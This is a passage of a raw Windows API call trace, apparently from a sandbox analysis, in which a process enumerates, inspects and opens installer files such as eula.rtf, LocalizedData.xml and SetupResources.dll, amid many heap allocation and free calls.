dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.860] GetFileType (hFile=0x41c) returned 0x1 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0060.860] CloseHandle (hObject=0x41c) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.861] AreFileApisANSI () returned 1 [0060.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0060.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0060.861] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3)) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.861] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0060.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.862] AreFileApisANSI () returned 1 [0060.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.862] AreFileApisANSI () returned 1 [0060.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0060.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0060.863] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.863] GetFileType (hFile=0x41c) returned 0x1 [0060.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.863] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.863] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.863] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.863] CloseHandle (hObject=0x41c) returned 1 [0060.863] AreFileApisANSI () returned 1 [0060.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0060.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0060.864] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.864] GetFileType (hFile=0x41c) returned 0x1 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0060.864] CloseHandle (hObject=0x41c) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.865] AreFileApisANSI () returned 1 [0060.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0060.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0060.865] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c)) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.865] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.866] AreFileApisANSI () returned 1 [0060.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.866] AreFileApisANSI () returned 1 [0060.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0060.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0060.866] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.867] GetFileType (hFile=0x41c) returned 0x1 [0060.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.868] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.868] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.868] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.868] CloseHandle (hObject=0x41c) returned 1 [0060.868] AreFileApisANSI () returned 1 [0060.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0060.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0060.868] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.869] GetFileType (hFile=0x41c) returned 0x1 [0060.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.869] CloseHandle (hObject=0x41c) returned 1 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 